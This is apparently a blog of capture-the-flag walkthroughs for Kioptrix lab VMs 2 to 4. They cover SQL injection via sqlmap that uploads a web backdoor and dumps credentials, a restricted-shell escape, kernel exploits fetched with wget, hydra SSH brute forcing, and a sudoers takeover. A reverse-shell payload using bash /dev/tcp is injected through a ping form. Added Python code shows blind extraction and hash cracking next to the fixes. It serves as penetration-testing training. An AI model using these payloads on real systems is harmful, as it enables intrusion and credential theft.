Monday, May 12, 2014

Kioptrix Series: Challenge 4

1. Find the VM: I am running Kali and the K4 VM both on the NAT interface. My Kali VM got a DHCP address of 172.16.32.132, so I scan the whole /24 (-P0 is the older spelling of -Pn: skip host discovery and probe every address):
# nmap -P0 172.16.32.1-255
I see a system running SSH, HTTP, NETBIOS and Microsoft-DS at 172.16.32.136:
Nmap scan report for 172.16.32.136
Host is up (0.00062s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:3C:9F:68 (VMware)

2. Get a detailed scan of K4:
# nmap -A 172.16.32.136
3. Browsing with a web browser to our target, we find a login page. Let’s look at the data being sent with a web proxy:
·      Applications >> Kali Linux >> Web Applications >> Web Application Proxies >> owasp-zap
·      Click the → button to capture all outgoing requests
·      In Iceweasel: Edit >> Preferences >> Advanced >> Network >> Settings…
Select “Manual proxy configuration” and set the HTTP Proxy to 127.0.0.1, port 8080. This proxies all our web traffic through ZAP locally, which gives us a better look at the data.
·      On the target login page, input ‘admin’ and ‘pass’ in the appropriate fields
ZAP will break on the request and show the following data:

·      Pressing the play button will allow the request to continue. You can also capture the return data by clicking the ← button.
4. Let’s see if that data is injectable. We’ll inject on the password parameter:
# sqlmap -u http://172.16.32.136/checklogin.php \
    --data='myusername=admin&mypassword=pass&Submit=Login' -p 'mypassword' \
    --level=5 --risk=3 --batch

Looks like that parameter is indeed injectable. Let's see if we can get a shell. --os-shell makes sqlmap write a PHP stager into the web root through the injection (the INTO OUTFILE lines below), which needs the MySQL account to hold the FILE privilege and a web root the MySQL process can write to; both hold here:
# sqlmap -u http://172.16.32.136/checklogin.php \
    --data='myusername=admin&mypassword=pass&Submit=Login' -p 'mypassword' \
    --level=5 --risk=3 --os-shell

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:45:30

[16:45:30] [INFO] resuming back-end DBMS 'mysql'
[16:45:30] [INFO] testing connection to the target URL
[16:45:30] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-2255' OR (2963=2963) AND 'IlKu'='IlKu&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: myusername=admin&mypassword=pass' AND 4203=BENCHMARK(5000000,MD5(0x53624d61)) AND 'SNSY'='SNSY&Submit=Login
---
[16:45:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[16:45:30] [INFO] going to use a web backdoor for command prompt
[16:45:30] [INFO] fingerprinting the back-end DBMS operating system
[16:45:30] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[16:45:36] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for web server document root?
[1] common location(s) '/var/www/' (default)
[2] custom location
[3] custom directory list file
[4] brute force search

> 1
[16:45:38] [INFO] retrieved web server full paths: '/var/www/checklogin.php'
[16:45:38] [INFO] trying to upload the file stager on '/var/www' via LIMIT INTO OUTFILE technique
[16:45:38] [INFO] the file stager has been successfully uploaded on '/var/www' - http://172.16.32.136:80/tmpubyld.php
[16:45:38] [WARNING] unable to upload the file through the web file stager to '/var/www'
[16:45:38] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n]
[16:45:41] [INFO] the backdoor has been successfully uploaded on '/var/www' - http://172.16.32.136:80/tmpbnhin.php
[16:45:41] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

os-shell> id
do you want to retrieve the command standard output? [Y/n/a] a
command standard output:    'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> uname -a
command standard output:    'Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux'

That kernel version looks familiar. A Google search for exploit linux 2.6.24-24 finds http://blog.harux.com/2012/04/exploit-local-root-linux-kernel-2426.html; the exploit it mentions comes from SecurityFocus BID 36038, the sock_sendpage() NULL pointer dereference (CVE-2009-2692). Let's see if we can download it:
os-shell> wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c

Hmmm, nothing was written. One check before blaming the network: sqlmap wrote its stager through MySQL (INTO OUTFILE), and its warning above says the web server user could not write to /var/www, so retry the wget from a directory www-data can write to, such as /tmp, to rule out a plain permission problem. With that excluded, the likely cause is that local firewall rules on the victim block outbound connections. Let's see what else sqlmap can get us:
# sqlmap -u http://172.16.32.136/checklogin.php \
    --data='myusername=admin&mypassword=pass&Submit=Login' -p 'mypassword' \
    --level=5 --risk=3 --dump --passwords --current-db

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:33:11

[17:33:11] [INFO] resuming back-end DBMS 'mysql'
[17:33:11] [INFO] testing connection to the target URL
[17:33:11] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-2255' OR (2963=2963) AND 'IlKu'='IlKu&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: myusername=admin&mypassword=pass' AND 4203=BENCHMARK(5000000,MD5(0x53624d61)) AND 'SNSY'='SNSY&Submit=Login
---
[17:33:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[17:33:11] [INFO] fetching current database
[17:33:11] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:33:11] [INFO] retrieved:
sqlmap got a 302 redirect to 'http://172.16.32.136:80/login_success.php'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N]
members
current database:    'members'
[17:33:18] [INFO] fetching database users password hashes
[17:33:18] [INFO] fetching database users
[17:33:18] [INFO] fetching number of database users
[17:33:18] [INFO] retrieved: 6
[17:33:18] [INFO] retrieved: 'root'@'localhost'
[17:33:20] [INFO] retrieved: 'root'@'Kioptrix4'
[17:33:22] [INFO] retrieved: 'root'@'127.0.0.1'
[17:33:23] [INFO] retrieved: 'debian-sys-maint'@'localhost'
[17:33:26] [INFO] retrieved: ''@'localhost'
[17:33:28] [INFO] retrieved: ''@'Kioptrix4'
[17:33:29] [INFO] fetching number of password hashes for user 'root'
[17:33:29] [INFO] retrieved: 1
[17:33:29] [INFO] fetching password hashes for user 'root'
[17:33:29] [INFO] retrieved:
[17:33:29] [INFO] retrieved:
[17:33:30] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[17:33:30] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[17:33:30] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[17:33:30] [INFO] retrieved: 1
[17:33:30] [INFO] fetching password hashes for user 'debian-sys-maint'
[17:33:30] [INFO] retrieved: *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879
[17:33:33] [INFO] fetching number of password hashes for user ''
[17:33:33] [INFO] retrieved: 1
[17:33:33] [INFO] fetching password hashes for user ''
[17:33:33] [INFO] retrieved:
[17:33:33] [INFO] retrieved:
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
[17:33:38] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[17:33:40] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[17:33:41] [INFO] starting dictionary-based cracking (mysql_passwd)
[17:33:41] [INFO] starting 2 processes
[17:33:56] [WARNING] no clear password(s) found                                                    
database management system users password hashes:
[*]  [1]:
    password hash: NULL
[*] debian-sys-maint [1]:
    password hash: *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879
[*] root [1]:
    password hash: NULL

[17:33:56] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[17:33:56] [INFO] fetching current database
[17:33:56] [INFO] fetching tables for database: 'members'
[17:33:56] [INFO] fetching number of tables for database 'members'
[17:33:56] [INFO] retrieved: 1
[17:33:56] [INFO] retrieved: members
[17:33:57] [INFO] fetching columns for table 'members' in database 'members'
[17:33:57] [INFO] retrieved: 3
[17:33:57] [INFO] retrieved: id
[17:33:58] [INFO] retrieved: username
[17:33:58] [INFO] retrieved: password
[17:33:59] [INFO] fetching entries for table 'members' in database 'members'
[17:33:59] [INFO] fetching number of entries for table 'members' in database 'members'
[17:33:59] [INFO] retrieved: 2
[17:33:59] [INFO] retrieved: 1
[17:34:00] [INFO] retrieved: MyNameIsJohn
[17:34:01] [INFO] retrieved: john
[17:34:01] [INFO] retrieved: 2
[17:34:01] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[17:34:03] [INFO] retrieved: robert
[17:34:04] [INFO] analyzing table dump for possible password hashes
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+

[17:34:04] [INFO] table 'members.members' dumped to CSV file '/usr/share/sqlmap/output/172.16.32.136/dump/members/members.csv'
[17:34:04] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.32.136'

[*] shutting down at 17:34:04

We’ve got credentials, and they are stored in the clear rather than hashed (robert's looks like base64, but try it exactly as stored before assuming it is encoded).

5. SSH login as john drops us into some kind of limited shell. Let's use the sqlmap os-shell (which runs as the web server user) to find out which one:
os-shell> cat /etc/passwd
command standard output:
---
root:x:0:0:root:/root:/bin/bash
< - - snip - - >
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
os-shell> kshell --version
command standard output:    'lshell-0.9.12 - Limited Shell'

Google shows that lshell 0.9.12 has a known escape: http://www.aldeid.com/wiki/Lshell. From the lshell prompt of the ssh session as john, let's bypass the restricted shell:

$ echo os.system('/bin/bash')

Now we've got a normal bash shell. Let's try to get that exploit onto the box. The victim appears to block outbound connections, but our ssh session is inbound and already established, so we'll move the file through it: copy and paste! Compiling an exploit on the victim is not always easy, so let's compile it locally (the target is 32-bit, so on a 64-bit Kali add -m32; -static avoids a glibc mismatch with Ubuntu 8.04; if the binary still won't run and the victim has gcc, paste the source instead and build it there):
# gcc 36038-6.c -o exploit

Since it would be rather difficult to copy and paste a binary, we'll use base64:
base64 exploit

Copy the base64 text from the Kali terminal into a file on the victim (using vim, nano, etc.), decode it, and compare md5sum output on both sides before running it. The decoded file also needs its execute bit set:
$ base64 -d exploit.b64 > exploit
$ chmod +x exploit
$ ./exploit
# whoami
root
# id
uid=0(root) gid=0(root) groups=1002(robert)

Finished! Now go back and see how else you could have gotten root; there’s more than one way!

Kioptrix Series: Challenge 3

1. Find the VM: I am running Kali and the K3 VM both on the NAT interface. My Kali VM got a DHCP address of 172.16.32.132, so I scan the whole /24:
# nmap -P0 172.16.32.1-255
I see a system running SSH and HTTP at 172.16.32.135 (you may want to edit /etc/hosts to map that IP address to kioptrix3.com):
Nmap scan report for 172.16.32.135
Host is up (0.00063s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:B0:52:F2 (VMware)

2. Get a detailed scan of K3:
# nmap -A 172.16.32.135
3. Run a vulnerability scan:
·      Applications >> Kali Linux >> System Services >> OpenVas >> openvas start
·      In a Terminal, start the web interface: # gsad
·      Open a browser and navigate to https://localhost
·      Login with the password you created in setup (username is admin)
·      Configuration >> Targets
·      Click the star icon (New Target)
·      Fill in the details (Name: K3, Hosts: <IP address of K3>)
·      Create Target
·      Scan Management >> New Task
·      Fill in the details (Name: K3, Scan Targets: K3)
·      Create Task
·      Click the play button under Actions (Start)
·      While you're waiting, click the magnifier (Details) and then again at the next page to look at the results as they come in

4. OpenVAS flags LotusCMS 3.0, which serves the login page at http://kioptrix3.com/index.php?system=Admin. Metasploit has a module for its eval() remote command execution, exploit/multi/http/lcms_php_exec. Let’s use it:
# msfconsole
msf > search lotuscms
msf > use exploit/multi/http/lcms_php_exec
msf > show options
msf > set RHOST kioptrix3.com
msf > set URI /index.php?system=Admin
msf > show payloads
msf > set PAYLOAD php/meterpreter/bind_tcp
msf > exploit
meterpreter > shell
Process 4825 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/home/www/kioptrix3.com
cd /tmp
ls -ld /tmp
drwxrwxrwt 4 root root 4096 Sep 21 09:48 /tmp
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

5. First, let’s see if this kernel is vulnerable. A Google search for exploit linux 2.6.24-24 finds http://blog.harux.com/2012/04/exploit-local-root-linux-kernel-2426.html, the same SecurityFocus exploit used in the Challenge 4 write-up above. From /tmp, where www-data can write:
wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c
gcc 36038-6.c -o exploit
./exploit
mmap: Permission denied

Okay, that didn’t work. "mmap: Permission denied" means the kernel refused to map the page at address 0, which this NULL-pointer-dereference exploit needs in order to plant its payload; Ubuntu enforces that through the vm.mmap_min_addr sysctl (readable at /proc/sys/vm/mmap_min_addr). Let’s try something else.
6. Let’s look at the users available on the system
cat /etc/passwd
We target user loneferret.
7. Applications >> Kali Linux >> Password Attacks >> Online Attacks >> hydra-gtk
Single Target: kioptrix3.com
Port: 22
Protocol: ssh
Username: loneferret
Password List: /usr/share/wordlists/metasploit/burnett_top_500.txt
Start

After a few seconds you should have guessed loneferret’s password. Let's login as loneferret via ssh:
# ssh loneferret@kioptrix3.com
We attempt to sudo to root but get the error "Sorry, user loneferret is not allowed to execute '/bin/su' as root on Kioptrix3." So what can loneferret execute as root? (sudo -l lists it.)
8. A README in loneferret's home directory points at an editor called ht that loneferret may run with sudo. This editor uses ALT to reach its menus, so disable the conflicting shortcuts in your Gnome Terminal: Edit >> Keyboard Shortcuts, then uncheck both "Enable menu access keys" and "Enable the menu shortcut key".
An editor running as root can write any file as root, so the "!/usr/bin/su" deny rule in the sudoers entry protects nothing. Let's change /etc/sudoers to allow all commands (carefully: ht, unlike visudo, does not syntax-check the file, and a broken sudoers disables sudo entirely):
sudo ht /etc/sudoers
Change loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
to loneferret ALL=NOPASSWD:ALL
Hint: the F1 - F10 keys map to the bottom options while ALT+F, ALT+E, etc. map to the top options.
Save and close the file.
sudo su
Win!

Monday, March 31, 2014

Kioptrix Series: Challenge 2


1. Find the VM: I am running Kali and the K2 VM both on the NAT interface. My Kali VM got a DHCP address of 172.16.32.132, so I scan the whole /24:
# nmap -P0 172.16.32.1-255
I see a system running SSH, HTTP, HTTPS, RPCBIND, MYSQL, etc. at 172.16.32.134:
Nmap scan report for 172.16.32.134
Host is up (0.00058s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql
MAC Address: 00:0C:29:E3:A6:03 (VMware)

2. Get a detailed scan of K2:
# nmap -A 172.16.32.134
3. Run a vulnerability scan:
·      Applications >> Kali Linux >> System Services >> OpenVas >> openvas start
·      In a Terminal, start the web interface: # gsad
·      Open a browser and navigate to https://localhost
·      Login with the password you created in setup (username is admin)
·      Configuration >> Targets
·      Click the star icon (New Target)
·      Fill in the details (Name: K2, Hosts: <IP address of K2>)
·      Create Target
·      Scan Management >> New Task
·      Fill in the details (Name: K2, Scan Targets: K2)
·      Create Task
·      Click the play button under Actions (Start)
·      While you're waiting, click the magnifier (Details) and then again at the next page to look at the results as they come in

4. Once the scan is complete, you'll see lots of PHP findings but nothing that gives remote access on its own. We’ll keep looking.
5. Let's look at the web server. We do a scan with nikto:
# nikto -h 172.16.32.134
Not much to use here. Continuing on…

6. Browsing with a web browser to our target, we find a login page. Let’s look at the data being sent with a web proxy:
·      Applications >> Kali Linux >> Web Applications >> Web Application Proxies >> owasp-zap
·      Click the → button to capture all outgoing requests
·      In Iceweasel: Edit >> Preferences >> Advanced >> Network >> Settings…
Select “Manual proxy configuration” and set the HTTP Proxy to 127.0.0.1, port 8080. This proxies all our web traffic through ZAP locally, which gives us a better look at the data.
·      On the target login page, input ‘admin’ and ‘pass’ in the appropriate fields
ZAP will break on the request and show the following data:

·      Pressing the play button will allow the request to continue. You can also capture the return data by clicking the ← button.
7. ZAP has shown us the format of the HTTP POST data being sent; now we can use some previous knowledge to gain access to the target. The nmap output shows MySQL running on the system, so let’s check for SQL injection.
Most likely the PHP page builds a SQL query from the form fields, something like this:
$query = "SELECT * FROM users WHERE username = '$uname' AND password='$psw'";
The expected input:
$query = "SELECT * FROM users WHERE username = 'admin' AND password='pass'";
Our SQL injection input (' OR 1=1 -- - in the password field):
$query = "SELECT * FROM users WHERE username = 'admin' AND password='' OR 1=1 -- -'";

This works because we first close the single quote, follow it with OR 1=1 (which is always true), and the “-- -” comments out the rest of the query. AND binds tighter than OR, so the WHERE clause becomes (username = 'admin' AND password = '') OR 1=1, which matches every row; the application takes the first row returned and logs us in as that user. The trailing "-" matters on MySQL, where "--" only starts a comment when whitespace follows it.
Using this injection gives us access to an administrative tool that allows us to ping.
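To make the mechanics concrete, here is an added example (my own code, not from the original post): a small Python/sqlite3 model of the login query above. It shows the ' OR 1=1 -- - bypass, the boolean-based blind extraction that sqlmap performed in the Challenge 4 write-up above (its probes have the same x' OR (<condition>) AND 'a'='a shape as sqlmap's payload), and the parameterized query that stops both. The members table, its rows and the blind_extract() helper are constructed for the example; the back end is SQLite rather than the VM's MySQL, so the string functions used in the probes (length, substr, unicode) are SQLite's.

```python
import sqlite3

# Constructed sample data modelled on the members table sqlmap dumped above
# (the rows are made up for this example).
ROWS = [(1, "john", "MyNameIsJohn"), (2, "robert", "Winter2014")]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?, ?)", ROWS)
    return db


def login_vulnerable(db, username, password):
    """checklogin.php-style: the form values are pasted straight into the SQL."""
    query = ("SELECT id FROM members WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return db.execute(query).fetchone() is not None


def login_fixed(db, username, password):
    """Same query with bound parameters: input is data and can never become SQL."""
    query = "SELECT id FROM members WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


def blind_extract(oracle, subquery, max_len=64):
    """Recover the string returned by `subquery` using only the yes/no answer of
    a login function (boolean-based blind injection, what sqlmap did above).
    Every probe is   x' OR (<condition>) AND 'a'='a   and each unknown value is
    found by binary search: first the length, then each character's code point.
    """
    def ask(condition):
        return oracle("admin", "x' OR (%s) AND 'a'='a" % condition)

    def search(greater_than, lo, hi):
        # smallest v in [lo, hi] for which greater_than(v) is false, i.e. the value
        while lo < hi:
            mid = (lo + hi) // 2
            if greater_than(mid):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = search(lambda n: ask("length((%s)) > %d" % (subquery, n)), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = search(lambda n: ask("unicode(substr((%s), %d, 1)) > %d"
                                    % (subquery, pos, n)), 0, 127)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    print("normal login:  ", login_vulnerable(db, "john", "MyNameIsJohn"))
    print("bypass, vuln:  ", login_vulnerable(db, "admin", "' OR 1=1 -- -"))
    print("bypass, fixed: ", login_fixed(db, "admin", "' OR 1=1 -- -"))
    secret = "SELECT password FROM members WHERE username = 'robert'"
    print("blind, vuln:   ", repr(blind_extract(lambda u, p: login_vulnerable(db, u, p), secret)))
    print("blind, fixed:  ", repr(blind_extract(lambda u, p: login_fixed(db, u, p), secret)))
```

Against the parameterized version every probe is answered "no", so blind_extract() concludes the secret has length zero and returns an empty string; against the vulnerable version it recovers robert's password in roughly 80 requests, which is why sqlmap's output above crawls along a character at a time.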
8. Since we know SQL injection is possible in that HTTP POST data, let’s look at a tool that automates SQL injection: sqlmap.
# sqlmap -h
We give sqlmap the URL the form posts to (the ?=1 in the query string is not needed once --data is supplied, but does no harm), the POST body via --data so it knows which parameters to test, the maximum level and risk values (5 and 3 respectively; risk 3 adds OR-based payloads that can modify data if they land in an UPDATE or DELETE, acceptable on a lab VM), and --passwords to pull the database users' hashes if it can inject:
# sqlmap -u http://172.16.32.134/index.php?=1 --data="uname=admin&psw=pass&btnLogin=Login" --level=5 --risk=3 --passwords

[*] starting at 22:00:29

[22:00:29] [INFO] testing connection to the target URL
[22:00:29] [INFO] testing if the target URL is stable. This can take a couple of seconds
[22:00:31] [INFO] target URL is stable
[22:00:31] [INFO] testing if POST parameter 'uname' is dynamic
<--snip-->
[22:01:03] [INFO] testing MySQL
[22:01:03] [INFO] confirming MySQL
[22:01:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 4.9
web application technology: PHP 4.3.9, Apache 2.0.52
back-end DBMS: MySQL < 5.0.0
[22:01:03] [INFO] fetching database users password hashes
[22:01:03] [INFO] fetching database users
[22:01:03] [INFO] fetching number of database users
[22:01:03] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:01:03] [INFO] retrieved: 3
[22:01:03] [INFO] retrieved:
[22:01:03] [INFO] retrieved:
[22:01:03] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[22:01:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[22:01:03] [INFO] retrieved: john
[22:01:03] [INFO] retrieved: root
[22:01:04] [INFO] fetching number of password hashes for user 'john'
[22:01:04] [INFO] retrieved: 1
[22:01:04] [INFO] fetching password hashes for user 'john'
[22:01:04] [INFO] retrieved: 5a6914ba69e02807
[22:01:05] [INFO] fetching number of password hashes for user 'root'
[22:01:05] [INFO] retrieved: 1
[22:01:05] [INFO] fetching password hashes for user 'root'
[22:01:05] [INFO] retrieved: 5a6914ba69e02807
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
[22:01:15] [INFO] using hash method 'mysql_old_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[22:01:20] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[22:01:25] [INFO] starting dictionary-based cracking (mysql_old_passwd)
[22:01:25] [INFO] starting 2 processes
[22:01:37] [INFO] cracked password 'hiroshima' for user 'john'                                    
database management system users password hashes:                                                 
[*] john [1]:
    password hash: 5a6914ba69e02807
    clear-text password: hiroshima
[*] root [1]:
    password hash: 5a6914ba69e02807
    clear-text password: hiroshima

[22:01:42] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.32.134'

[*] shutting down at 22:01:42
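Two things in that output deserve a closer look: 'mysql_old_passwd' is the unsalted pre-4.1 OLD_PASSWORD() format, and john and root have the identical hash, which on its own tells us they share a password before anything is cracked. The following is an added example (my own code, not from the original post) that implements that hash, the SHA1-based PASSWORD() format seen for debian-sys-maint in the Challenge 4 dump, and the dictionary attack sqlmap ran. The wordlist is constructed for the example; the 5a6914ba69e02807 hash is the one sqlmap retrieved above.

```python
import hashlib

MASK32 = 0xFFFFFFFF


def mysql_old_password(password):
    """MySQL pre-4.1 OLD_PASSWORD(): the 16-hex-char format sqlmap labelled
    'mysql_old_passwd'. Two 32-bit accumulators mixed per byte, no salt, so
    equal passwords always give equal hashes. Assumes ASCII input."""
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for ch in password:
        if ch in " \t":          # the original skips blanks
            continue
        tmp = ord(ch)
        nr = (nr ^ ((((nr & 63) + add) * tmp) + (nr << 8))) & MASK32
        nr2 = (nr2 + ((nr2 << 8) ^ nr)) & MASK32
        add += tmp
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


def mysql_native_password(password):
    """MySQL 4.1+ PASSWORD(): '*' + SHA1(SHA1(pw)) in upper-case hex, the
    41-char format seen for debian-sys-maint above. Still unsalted."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def crack(target_hash, wordlist):
    """Dictionary attack as sqlmap's --passwords did: hash each candidate and
    compare. The format is picked from the hash's shape."""
    target = target_hash.lower()
    hasher = mysql_native_password if target.startswith("*") else mysql_old_password
    for word in wordlist:
        if hasher(word).lower() == target:
            return word
    return None


# Constructed wordlist for the example (sqlmap used its bundled wordlist.zip).
WORDLIST = ["123456", "password", "kioptrix", "nagasaki", "hiroshima", "letmein"]

if __name__ == "__main__":
    h = "5a6914ba69e02807"   # hash sqlmap retrieved for both 'john' and 'root'
    print("cracked:", crack(h, WORDLIST))
```

Because neither format uses a salt, identical hashes mean identical passwords, and one pass over the wordlist cracks every user sharing that hash at once; a salted, slow hash (bcrypt, scrypt, Argon2) is what removes both shortcuts.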

9. Play around with sqlmap and see what other data you can recover. We could probably use those usernames and passwords to log in to MySQL remotely, but let’s take a closer look at that administrative ping page. This is a classic case of command injection. Looking at the source for the page, we see the form posts to another PHP file, pingit.php, which runs ping against whatever we submit and returns the output. Let’s see what happens when we input the following:
localhost; whoami; id
PING localhost.localdomain (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost.localdomain (127.0.0.1): icmp_seq=0 ttl=64 time=0.022 ms
64 bytes from localhost.localdomain (127.0.0.1): icmp_seq=1 ttl=64 time=0.049 ms
64 bytes from localhost.localdomain (127.0.0.1): icmp_seq=2 ttl=64 time=0.050 ms

--- localhost.localdomain ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.022/0.040/0.050/0.014 ms, pipe 2
apache
uid=48(apache) gid=48(apache) groups=48(apache)

So now we know the command is being run by user apache. Go ahead and see what happens when you run other commands like ls and find.
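The ping page fails in the usual way: the form value is glued onto a shell command line, so every shell metacharacter in it (;, |, &&, backticks, $(...)) is honoured. Here is an added example (my own code, not from the original page) showing that pattern beside the fix: validate the target against an allow-list and run the program without a shell. ping is replaced by echo so the example runs anywhere without raw-socket privileges; the injected inputs and the host-name rule are constructed for the example.

```python
import ipaddress
import re
import subprocess

# RFC 1123 host name: dot-separated labels of letters, digits and hyphens that
# neither start nor end with a hyphen (so nothing that looks like an option).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)

# Stand-in for "ping -c 3": the shell handling is what this example is about.
BASE_CMD = ["echo", "PING"]


def run_vulnerable(target):
    """pingit.php-style: the form value is spliced into a single shell string,
    so 'localhost; id' runs id. Returns what the shell printed."""
    cmdline = " ".join(BASE_CMD) + " " + target
    return subprocess.run(cmdline, shell=True, capture_output=True, text=True).stdout


def validate_target(target):
    """Allow-list: an IPv4/IPv6 literal or a host name; anything else raises.
    Returns the value unchanged so callers can chain it."""
    try:
        ipaddress.ip_address(target)
        return target
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError("refusing ping target %r" % target)


def run_fixed(target):
    """No shell at all: an argv list, and the target validated first."""
    argv = BASE_CMD + [validate_target(target)]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    print(run_vulnerable("localhost; id"), end="")
    try:
        run_fixed("localhost; id")
    except ValueError as err:
        print("fixed:", err)
    print(run_fixed("localhost"), end="")
```

The argv list alone would already stop the shell from splitting the value, but the allow-list is still needed: without it a value such as -f or an option-looking host name would be passed to ping as an argument, and defence in depth costs one regular expression.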
10. Now let's see if we can have it send us back a shell. First we need a listener:
# nc -l -p 4444
Now we input a command into the administrative page to give us a reverse shell. Take your pick from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet and see what works (the one below relies on bash's /dev/tcp redirection):
localhost; bash -i >& /dev/tcp/172.16.32.132/4444 0>&1
Success!
11. Now we just need root. Let's look at the kernel version:
$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux

A Google search for "2.6.9-55 exploit" reveals an exploit for ip_append_data() (the udp_sendmsg() uninitialised-pointer bug, CVE-2009-2698). Let's look in ExploitDB for that one:
# searchsploit ip_append_data
